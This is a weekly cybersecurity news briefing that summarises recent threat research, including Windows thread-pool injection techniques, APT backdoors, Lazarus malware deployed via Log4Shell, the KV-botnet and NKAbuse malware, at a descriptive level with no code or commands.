Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Briefing, 9 - 15 December
New Process Injection Techniques Undetectable by EDR Solutions
Security researchers at SafeBreach have discovered 8 new process injection techniques that exploit Windows thread pools to trigger the execution of malicious code as a result of legitimate actions.
These injection variants have been named Pool Party, they operate in all processes, without limitations and are not detected by leading detection and response (EDR) solutions. In its tests, SafeBreach has achieved a 100% success rate, as none of the EDRs were able to detect or prevent the Pool Party attacks.
APT Sandman uses KEYPLUG as a backdoor
The Sandman APT has been found to be linked to Chinese threat actors and is using the KEYPLUG backdoor, specifically the STORM-0866/Red Dev 40 cluster. Both PwC and Microsoft highlighted this connection during the recent LABScon 2023 cybersecurity conference. The LuaDream malware and the KEYPLUG backdoor were found to coexist on the victims' systems.
Sandman and STORM-0866/Red Dev 40 also engage in similar infrastructure control and management practices, such as the choice of hosting providers or the set of rules used for naming domains. The implementation of LuaDream and KEYPLUG suggests very similar development practices and that both have similar.
Lazarus deploys three new malwares in a new campaign
Cisco Talos researchers have discovered a new operation attributed to the North Korean APT Lazarus, which they have named Operation Blacksmith. In this campaign, the APT has employed three new malwares programmed in D, two of which are remote access trojans (RATs), which they have named NineRAT and DLRAT, while the third is reportedly a downloader under the name BottomLoader.
According to the researchers, the operation began in March 2023 and has mainly targeted the industrial, agricultural and security sectors. During the campaign, Lazarus also exploited the CVE-2021-44228 CVSS 10.0 vulnerability, known as Log4Shell, to deploy the three malwares.
It should be noted that Log4Shell is a flaw affecting the Apache Foundation Log4j library and would allow an attacker to execute remote code.
Threat actor Volt Typhoon is employing KV-botnet
Black Lotus Team researchers at Lumen Technologies have detected and published an analysis of a new botnet they have named KV-botnet. This botnet, consisting of small office/home office (SOHO) routers, is used by various threat actors as a hidden data transfer network.
The researchers note that the activity of KV-botnet, active since February 2022, has increased considerably since August 2023. Also, there are two clusters of activity on the botnet, named KV and JDY. While the former appears to be manually operated in attacks on high value-added entities, the latter performs broader scans and is less technically sophisticated.
According to Black Lotus Team, this botnet is reportedly operated by the Chinese threat actor Volt Typhoon, also known as Bronze Silhouette, and used in attacks against telecommunications companies and U.S. government entities, among others.
NKAbuse malware uses blockchain to perform DDoS
Kaspersky security researchers have reported the discovery of a new malware called NKAbuse, which is based on Go and is the first to abuse NKN (New Kind of Network) technology for data exchange, making it a stealthy threat. NKAbuse runs nodes in a similar way to the Tor network, which contributes to being more robust, decentralized and increasing its ability to handle significantly high data volumes.
In addition to DDoS capabilities, NKAbuse also acts as a RAT on compromised systems, allowing its operators to perform command execution, data exfiltration and screenshots.
